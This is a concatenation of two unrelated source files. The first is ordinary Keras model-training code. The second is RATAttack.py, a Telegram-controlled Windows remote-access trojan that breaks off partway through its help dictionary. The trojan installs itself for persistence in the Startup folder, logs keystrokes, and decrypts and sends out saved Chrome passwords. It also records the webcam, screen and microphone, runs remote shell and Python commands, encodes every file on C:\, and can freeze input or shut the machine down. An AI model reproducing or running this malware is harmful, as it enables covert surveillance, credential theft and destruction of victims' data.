sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
"""Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
"""Returns predictions for a single batch of samples.
# Arguments
x: Input samples, as a Numpy array.
# Returns
Numpy array(s) of predictions.
"""
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
@interfaces.legacy_generator_methods_support
def fit_generator(self, generator,
steps_per_epoch,
epochs=1,
verbose=1,
callbacks=None,
validation_data=None,
validation_steps=None,
class_weight=None,
max_q_size=10,
workers=1,
pickle_safe=False,
initial_epoch=0):
"""Fits the model on data yielded batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `steps_per_epoch`
batches have been seen by the model.
steps_per_epoch: Total number of steps (batches of samples)
to yield from `generator` before declaring one epoch
finished and starting the next epoch. It should typically
be equal to the number of unique samples if your dataset
divided by the batch size.
epochs: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
validation_steps: Only relevant if `validation_data`
is a generator. Total number of steps (batches of samples)
to yield from `generator` before stopping.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
steps_per_epoch=10000, epochs=10)
```
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not validation_steps:
raise ValueError('When using a generator for validation data, '
'you must specify a value for '
'`validation_steps`.')
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger(count_mode='steps')]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'epochs': epochs,
'steps': steps_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('validation_data should be a tuple '
'`(val_x, val_y, val_sample_weight)` '
'or `(val_x, val_y)`. Found: ' +
str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y, val_sample_weight)
val_data = val_x + val_y + val_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_data += [0.]
for cbk in callbacks:
cbk.validation_data = val_data
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(max_q_size=max_q_size, workers=workers)
callback_model.stop_training = False
while epoch < epochs:
callbacks.on_epoch_begin(epoch)
steps_done = 0
batch_index = 0
while steps_done < steps_per_epoch:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
# build batch logs
batch_logs = {}
if isinstance(x, list):
batch_size = x[0].shape[0]
elif isinstance(x, dict):
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# Construct epoch logs.
epoch_logs = {}
batch_index += 1
steps_done += 1
# Epoch finished.
if steps_done >= steps_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(
validation_data,
validation_steps,
max_q_size=max_q_size,
workers=workers,
pickle_safe=pickle_safe)
else:
# No need for try/except because
# data has already been validated.
val_outs = self.evaluate(
val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
finally:
if enqueuer is not None:
enqueuer.stop()
callbacks.on_train_end()
return self.history
@interfaces.legacy_generator_methods_support
def evaluate_generator(self, generator, steps,
max_q_size=10, workers=1, pickle_safe=False):
"""Evaluates the model on a data generator.
The generator should return the same kind of data
as accepted by `test_on_batch`.
# Arguments
generator: Generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
self._make_test_function()
steps_done = 0
wait_time = 0.01
all_outs = []
batch_sizes = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
if isinstance(x, list):
batch_size = len(x[0])
elif isinstance(x, dict):
batch_size = len(list(x.values())[0])
else:
batch_size = len(x)
all_outs.append(outs)
steps_done += 1
batch_sizes.append(batch_size)
finally:
if enqueuer is not None:
enqueuer.stop()
if not isinstance(outs, list):
return np.average(np.asarray(all_outs),
weights=batch_sizes)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=batch_sizes))
return averages
@interfaces.legacy_generator_methods_support
def predict_generator(self, generator, steps,
max_q_size=10, workers=1,
pickle_safe=False, verbose=0):
"""Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: Generator yielding batches of input samples.
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: Maximum size for the generator queue.
workers: Maximum number of processes to spin up
when using process based threading
pickle_safe: If `True`, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
self._make_predict_function()
steps_done = 0
wait_time = 0.01
all_outs = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
if verbose == 1:
progbar = Progbar(target=steps)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
# Compatibility with the generators
# used for training.
if len(generator_output) == 2:
x, _ = generator_output
elif len(generator_output) == 3:
x, _, _ = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
else:
# Assumes a generator that only
# yields inputs (not targets and sample weights).
x = generator_output
outs = self.predict_on_batch(x)
if not isinstance(outs, list):
outs = [outs]
if not all_outs:
for out in outs:
all_outs.append([])
for i, out in enumerate(outs):
all_outs[i].append(out)
steps_done += 1
if verbose == 1:
progbar.update(steps_done)
finally:
if enqueuer is not None:
enqueuer.stop()
if len(all_outs) == 1:
if steps_done == 1:
return all_outs[0][0]
else:
return np.concatenate(all_outs[0])
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
|
RATAttack.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, os.path, platform, ctypes
os.environ["PBR_VERSION"]='5.0.0'
import logging
from consoleTools import consoleDisplay as cd
from PIL import ImageGrab # /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout # console output
from json import loads # reading json from ipinfo.io
from winshell import startup # persistence
from tendo import singleton # this makes the application exit if there's another instance already running
from win32com.client import Dispatch # WScript.Shell
from time import strftime, sleep
from subprocess import Popen, PIPE # /cmd_exec
import psutil # updating
import shutil
import win32clipboard # register clipboard
import sqlite3 # get chrome passwords
import win32crypt # get chrome passwords
import base64 # /encrypt_all
import datetime # /schedule
import time
import threading # /proxy, /schedule
import proxy
import pyaudio, wave # /hear
import telepot, requests # telepot => telegram, requests => file download
from telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton
import pyHook, pythoncom # keylogger
import socket # internal IP
import getpass # get username
import collections
import urllib # wallpaper
import cv2 # webcam
from datetime import datetime
from ctypes import * # fixing pyinstaller - we need to import all the ctypes to get api-ms-win-crt-*, you will also need https://www.microsoft.com/en-US/download/details.aspx?id=48145
cd.log('i','Starting')
me = singleton.SingleInstance()
# REPLACE THE LINE BELOW WITH THE TOKEN OF THE BOT YOU GENERATED!
token = 'xx:xx'
if 'RVT_TOKEN' in os.environ: # it can also be set as an environment variable
token = os.environ['RVT_TOKEN']
# This will be used for setting paths and related file io -- change to whatever you want
app_name = 'ABCdef123'
# ADD YOUR chat_id IN STRING FORMAT TO THE LIST BELOW IF YOU WANT YOUR BOT TO ONLY RESPOND TO ONE PERSON!
known_ids = []
#known_ids.append(os.environ['TELEGRAM_CHAT_ID']if 'TELEGRAM_CHAT_ID' in os.environ) # make sure to remove this line if you don't have this environment variable
appdata_roaming_folder = os.environ['APPDATA'] # = 'C:\Users\Username\AppData\Roaming'
# HIDING OPTIONS
# ---------------------------------------------
hide_folder = appdata_roaming_folder + '\\' + app_name # = 'C:\Users\Username\AppData\Roaming\Portal'
compiled_name = app_name + '.exe' # Name of compiled .exe to hide in hide_folder, i.e 'C:\Users\Username\AppData\Roaming\Portal\portal.exe'
# ---------------------------------------------
target_shortcut = startup() + '\\' + compiled_name.replace('.exe', '.lnk')
if not os.path.exists(hide_folder):
os.makedirs(hide_folder)
hide_compiled = hide_folder + '\\' + compiled_name
copyfile(argv[0], hide_compiled)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(target_shortcut)
shortcut.Targetpath = hide_compiled
shortcut.WorkingDirectory = hide_folder
shortcut.save()
if not os.path.exists('logs/'):
os.mkdir('logs/')
if not os.path.exists('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d')))):
f=open('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d'))))
f.close()
global mouseFrozen
destroy = False
keyboardFrozen = False
mouseFrozen = False
curr_window = None
user = os.environ.get("USERNAME") # Windows username to append keylogs
schedule = {}
log_file = hide_folder + '\\.user'
keylogs_file = hide_folder + '\\.keylogs'
with open(log_file, "a") as writing:
writing.write("-------------------------------------------------\n")
writing.write(user + " Log: " + strftime("%b %d@%H:%M") + "\n\n")
logging.basicConfig(filename=log_file,level=logging.DEBUG)
def encode(file):
f = open(file)
data = f.read()
f.close()
encodedBytes = base64.b64encode(data)
#remove old file
os.remove(file)
#tag new file
file = file + '.nxr'
t = open(file, "w+")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
decodedBytes = base64.b64decode(data)
#remove old file
os.remove(file)
#tag new file
file = file.replace('.nxr', '')
t = open(file, "w+")
t.write(decodedBytes)
t.close()
def runStackedSchedule(everyNSeconds):
for k in schedule.keys():
if k < datetime.datetime.now():
handle(schedule[k])
del schedule[k]
threading.Timer(everyNSeconds, runStackedSchedule).start()
def internalIP():
internal_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
internal_ip.connect(('google.com', 0))
return internal_ip.getsockname()[0]
def checkchat_id(chat_id):
return len(known_ids) == 0 or str(chat_id) in known_ids
def get_curr_window():
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
hwnd = user32.GetForegroundWindow()
pid = ctypes.c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
process_id = "%d" % pid.value
executable = ctypes.create_string_buffer(512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
ctypes.windll.psapi.GetModuleBaseNameA(h_process, None, ctypes.byref(executable), 512)
window_title = ctypes.create_string_buffer(512)
length = user32.GetWindowTextA(hwnd, ctypes.byref(window_title), 512)
pid_info = "\n[ PID %s - %s - %s ]" % (process_id, executable.value, window_title.value)
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
return pid_info
def false_event(event):
return False
def true_event(event):
return True
def pressed_chars(event):
data = None
global curr_window
if event.WindowName != curr_window:
curr_window = event.WindowName
fp = open(keylogs_file, 'a')
data = get_curr_window()
fp.write(data + "\n")
fp.close()
if event and type(event.Ascii) == int:
f = open(keylogs_file,"a")
if len(event.GetKey()) > 1:
tofile = '<'+event.GetKey()+'>'
else:
tofile = event.GetKey()
if tofile == '<Return>':
print(tofile)
else:
stdout.write(tofile)
f.write(tofile)
f.close()
return not keyboardFrozen
def split_string(n, st):
lst = ['']
for i in str(st):
l = len(lst) - 1
if len(lst[l]) < n:
lst[l] += i
else:
lst += [i]
return lst
def send_safe_message(bot, chat_id, message):
while(True):
try:
cd.log('n','Message sent:\n{}'.format(bot.sendMessage(chat_id, message)),True)
break
except:
pass
def handle(msg):
chat_id = msg['chat']['id']
if checkchat_id(chat_id):
response = ''
if 'text' in msg:
cd.log('n','\n\t\tGot message from ' + str(chat_id) + ': ' + msg['text'] + '\n\n',True)
command = msg['text']
try:
if command == '/arp':
response = ''
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('arp -a -N ' + internalIP())
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command == '/capture_webcam':
bot.sendChatAction(chat_id, 'typing')
camera = cv2.VideoCapture(0)
while True:
return_value,image = camera.read()
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
cv2.imshow('image',gray)
if cv2.waitKey(1)& 0xFF == ord('s'):
cv2.imwrite('webcam.jpg',image)
break
camera.release()
cv2.destroyAllWindows()
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('webcam.jpg', 'rb'))
os.remove('webcam.jpg')
elif command == '/capture_pc':
bot.sendChatAction(chat_id, 'typing')
screenshot = ImageGrab.grab()
screenshot.save('screenshot.jpg')
bot.sendChatAction(chat_id, 'upload_photo')
bot.sendDocument(chat_id, open('screenshot.jpg', 'rb'))
os.remove('screenshot.jpg')
elif command.startswith('/cmd_exec'):
cd.log('w','Command exec prep')
process = Popen(['cmd'], stdin=PIPE, stdout=PIPE)
command = command.replace('/cmd_exec', '')
cd.log('w','Executing the command '+command)
if len(command) > 1:
process.stdin.write(bytes(command + '\n'))
process.stdin.close()
lines = process.stdout.readlines()
for l in lines:
response += l
else:
response = '/cmd_exec dir'
elif command.startswith('/cd'):
command = command.replace('/cd ','')
try:
os.chdir(command)
response = os.getcwd() + '>'
except:
response = 'No subfolder matching ' + command
elif command.startswith('/delete'):
command = command.replace('/delete', '')
path_file = command.strip()
try:
os.remove(path_file)
response = 'Succesfully removed file'
except:
try:
os.rmdir(path_file)
response = 'Succesfully removed folder'
except:
try:
shutil.rmtree(path_file)
response = 'Succesfully removed folder and it\'s files'
except:
response = 'File not found'
elif command == '/dns':
bot.sendChatAction(chat_id, 'typing')
lines = os.popen('ipconfig /displaydns')
for line in lines:
line.replace('\n\n', '\n')
response += line
elif command.startswith('/download'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/download', '')
path_file = path_file[1:]
if path_file == '':
response = '/download C:/path/to/file.name or /download file.name'
else:
bot.sendChatAction(chat_id, 'upload_document')
try:
bot.sendDocument(chat_id, open(path_file, 'rb'))
except:
try:
bot.sendDocument(chat_id, open(hide_folder + '\\' + path_file))
response = 'Found in hide_folder: ' + hide_folder
except:
response = 'Could not find ' + path_file
elif command.endswith('code_all'):
cd.log('w','Data encryption option.')
parentDirectory = 'C:\\'
for root, dirs, files in os.walk(parentDirectory):
for afile in files:
full_path = os.path.join(root, afile)
if command.startswith('/en'):
cd.log('w','WARNING ABOUT TO ENCRYPT DATA!!!! IN '+str(full_path))
encode(full_path)
elif command.startswith('/de') and full_path.endswith('.nxr'):#our extension (been encoded)
decode(full_path)
response = 'Files ' + command[1:3] + 'coded succesfully.'
elif command.startswith('/cp'):
command = command.replace('/cp', '')
command = command.strip()
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
copyfile(file1, file2)
response = 'Files copied succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/cp "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command.endswith('freeze_keyboard'):
global keyboardFrozen
keyboardFrozen = not command.startswith('/un')
hookManager.KeyAll = lambda event: not keyboardFrozen
response = 'Keyboard is now '
if keyboardFrozen:
response += 'disabled. To enable, use /unfreeze_keyboard'
else:
cd.log('w','Keyboard frozen')
response += 'enabled'
elif command.endswith('freeze_mouse'):
if mouseFrozen == False:
mse = pyHook.HookManager()
mse.MouseAll = false_event
mse.KeyAll = false_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'enabled. To disable use /unfreeze_mouse'
elif mouseFrozen == True:
cd.log('w','Keyboard frozen')
response += 'enabled. To disable, use /unfreeze_mouse'
else:
response += 'The script has commited the act of death'
elif command.endswith('unfreeze_mouse'):
if mouseFrozen == True:
mse = pyHook.HookManager()
mse.MouseAll = true_event
mse.KeyAll = true_event
mse.HookMouse()
mse.HookKeyboard()
pythoncom.PumpMessages()
response += 'disabled. To enable use /freeze_mouse'
elif mouseFrozen == False:
response += 'already disabled. To enable, use /freeze_mouse'
else:
response += 'The script has commited the act of death'
elif command == '/get_chrome':
con = sqlite3.connect(os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data')
cursor = con.cursor()
cursor.execute("SELECT origin_url,username_value,password_value from logins;")
for users in cursor.fetchall():
response += 'Website: ' + users[0] + '\n'
response += 'Username: ' + users[1] + '\n'
response += 'Password: ' + str(win32crypt.CryptUnprotectData(users[2], None, None, None, 0)) + '\n\n'
# """
# pass
elif command.startswith('/hear'):
try:
SECONDS = -1
try:
SECONDS = int(command.replace('/hear','').strip())
except:
SECONDS = 5
CHANNELS = 2
CHUNK = 1024
FORMAT = pyaudio.paInt16
RATE = 44100
audio = pyaudio.PyAudio()
bot.sendChatAction(chat_id, 'typing')
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
audio.terminate()
wav_path = hide_folder + '\\mouthlogs.wav'
waveFile = wave.open(wav_path, 'wb')
waveFile.setnchannels(CHANNELS)
waveFile.setsampwidth(audio.get_sample_size(FORMAT))
waveFile.setframerate(RATE)
waveFile.writeframes(b''.join(frames))
waveFile.close()
bot.sendChatAction(chat_id, 'upload_document')
except OSError:
cd.log('e','Unable to listen in - there is probably no input device.')
response = 'unable to listen in - there is probably no input device'
#bot.sendAudio(chat_id, audio=open(wav_path, 'rb'))
elif command == '/ip_info':
bot.sendChatAction(chat_id, 'find_location')
info = requests.get('http://ipinfo.io').text #json format
location = (loads(info)['loc']).split(',')
bot.sendLocation(chat_id, location[0], location[1])
import string
import re
response = 'External IP: '
response += "".join(filter(lambda char: char in string.printable, info))
response = re.sub('[:,{}\t\"]', '', response)
response += '\n' + 'Internal IP: ' + '\n\t' + internalIP()
elif command == '/keylogs':
bot.sendChatAction(chat_id, 'upload_document')
bot.sendDocument(chat_id, open(keylogs_file, "rb"))
elif command.startswith('/ls'):
bot.sendChatAction(chat_id, 'typing')
command = command.replace('/ls', '')
command = command.strip()
files = []
if len(command) > 0:
files = os.listdir(command)
else:
files = os.listdir(os.getcwd())
human_readable = ''
for file in files:
human_readable += file + '\n'
response = human_readable
elif command.startswith('/msg_box'):
message = command.replace('/msg_box', '')
if message == '':
response = '/msg_box yourText'
else:
ctypes.windll.user32.MessageBoxW(0, message, u'Information', 0x40)
response = 'MsgBox displayed'
elif command.startswith('/mv'):
command = command.replace('/mv', '')
if len(command) > 0:
try:
file1 = command.split('"')[1]
file2 = command.split('"')[3]
move(file1, file2)
response = 'Files moved succesfully.'
except Exception as e:
response = 'Error: \n' + str(e)
else:
response = 'Usage: \n/mv "C:/Users/DonaldTrump/Desktop/porn.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"'
response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)'
elif command == '/pc_info':
bot.sendChatAction(chat_id, 'typing')
info = ''
for pc_info in platform.uname():
info += '\n' + pc_info
info += '\n' + 'Username: ' + getpass.getuser()
response = info
elif command == '/ping':
response = platform.uname()[1] + ': I\'m up'
elif command.startswith('/play'):
command = command.replace('/play', '')
command = command.strip()
if len(command) > 0:
systemCommand = 'start \"\" \"https://www.youtube.com/embed/'
systemCommand += command
systemCommand += '?autoplay=1&showinfo=0&controls=0\"'
if os.system(systemCommand) == 0:
response = 'YouTube video is now playing'
else:
response = 'Failed playing YouTube video'
else:
response = '/play <VIDEOID>\n/play A5ZqNOJbamU'
elif command == '/proxy':
threading.Thread(target=proxy.main).start()
info = requests.get('http://ipinfo.io').text #json format
ip = (loads(info)['ip'])
response = 'Proxy succesfully setup on ' + ip + ':8081'
elif command == '/pwd':
response = os.getcwd()
elif command.startswith('/python_exec'):
command = command.replace('/python_exec','').strip()
if len(command) == 0:
response = 'Usage: /python_exec print(\'printing\')'
else:
cd.log('w','Executing python command')
# from StringIO import StringIO
# import sys
# old_stderr = sys.stderr
# old_stdout = sys.stdout
# sys.stderr = mystderr = StringIO()
# sys.stdout = mystdout = StringIO()
# exec(command in globals())
# if mystderr.getvalue() != None:
# response += mystderr.getvalue()
# if mystdout.getvalue() != None:
# response += mystdout.getvalue()
# sys.stderr = old_stderr
# sys.stdout = old_stdout
if response == '':
response = 'Expression executed. No return or malformed expression.'
elif command == '/reboot':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /r /f /t 0')
response = 'Computer will be restarted NOW.'
elif command.startswith('/run'):
bot.sendChatAction(chat_id, 'typing')
path_file = command.replace('/run', '')
path_file = path_file[1:]
if path_file == '':
response = '/run_file C:/path/to/file'
else:
try:
os.startfile(path_file)
response = 'File ' + path_file + ' has been run'
except:
try:
os.startfile(hide_folder + '\\' + path_file)
response = 'File ' + path_file + ' has been run from hide_folder'
except:
response = 'File not found'
elif command.startswith('/schedule'):
command = command.replace('/schedule', '')
if command == '':
response = '/schedule 2017 12 24 23 59 /msg_box happy christmas'
else:
scheduleDateTimeStr = command[1:command.index('/') - 1]
scheduleDateTime = datetime.datetime.strptime(scheduleDateTimeStr, '%Y %m %d %H %M')
scheduleMessage = command[command.index('/'):]
schedule[scheduleDateTime] = {'text' : scheduleMessage, 'chat' : { 'id' : chat_id }}
response = 'Schedule set: ' + scheduleMessage
runStackedSchedule(10)
elif command == '/self_destruct':
bot.sendChatAction(chat_id, 'typing')
global destroy
destroy = True
response = 'You sure? Type \'/destroy\' to proceed.'
elif command == '/shutdown':
bot.sendChatAction(chat_id, 'typing')
command = os.popen('shutdown /s /f /t 0')
response = 'Computer will be shutdown NOW.'
elif command == '/destroy' and destroy == True:
bot.sendChatAction(chat_id, 'typing')
if os.path.exists(hide_folder):
rmtree(hide_folder)
if os.path.isfile(target_shortcut):
os.remove(target_shortcut)
os._exit(0)
elif command == '/tasklist':
lines = os.popen('tasklist /FI \"STATUS ne NOT RESPONDING\"')
response2 = ''
for line in lines:
line.replace('\n\n', '\n')
if len(line)>2000:
response2 +=line
else:
response += line
response += '\n' + response2
elif command.startswith('/to'):
command = command.replace('/to','')
import winsound
winsound.Beep(440, 300)
if command == '':
response = '/to <COMPUTER_1_NAME>, <COMPUTER_2_NAME> /msg_box Hello HOME-PC and WORK-PC'
else:
targets = command[:command.index('/')]
if platform.uname()[1] in targets:
command = command.replace(targets, '')
msg = {'text' : command, 'chat' : { 'id' : chat_id }}
handle(msg)
elif command == '/update':
proc_name = app_name + '.exe'
if not os.path.exists(hide_folder + '\\updated.exe'):
response = 'Send updated.exe first.'
else:
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == proc_name:
proc.kill()
os.rename(hide_folder + '\\' + proc_name, hide_folder + '\\' + proc_name + '.bak')
os.rename(hide_folder + '\\updated.exe', hide_folder + '\\' + proc_name)
os.system(hide_folder + '\\' + proc_name)
sys.exit()
elif command.startswith('/wallpaper'):
command = command.replace('/wallpaper', '')
command = command.strip()
if len(command) == 0:
response = 'Usage: /wallpaper C:/Users/User/Desktop/porn.jpg'
elif command.startswith('http'):
image = command.rsplit('/',1)[1]
image = hide_folder + '/' + image
urllib.urlretrieve(command, image)
ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)
else:
ctypes.windll.user32.SystemParametersInfoW(20, 0, command.replace('/', '//'), 3)
response = 'Wallpaper succesfully set.'
elif command == '/help':
# functionalities dictionary: command:arguments
functionalities = { '/arp' : '', \
'/capture_pc' : '', \
'/cmd_exec' : '<command_chain>', \
'/cd':'<target_dir>', \
'/decode_all':'', \
'/delete':'<target_file>', \
'/dns':'', \
'/download':'<target_file>', \
'/encode_all':'', \
'/freeze_keyboard':'', \
'/freeze_mouse':'', \
'/get_chrome':'', \
'/hear':'[time in seconds, default=5s]', \
'/ip_info':'', \
'/keylogs':'', \
'/ls':'[target_folder]', \
'/msg_box':'<text>', \
'/pc_info':'', \
'/play':'<youtube_videoId>', \
'/proxy':'', \
'/pwd':'', \
'/python_exec':'<command_chain>', \
'/reboot':'', \
'/run':'<target_file>', \
'/self_destruct':'', \
'/shutdown':'', \
'/tasklist':'', \
'/to':'<target_computer>, [other_target_computer]',\
'/update':'',\
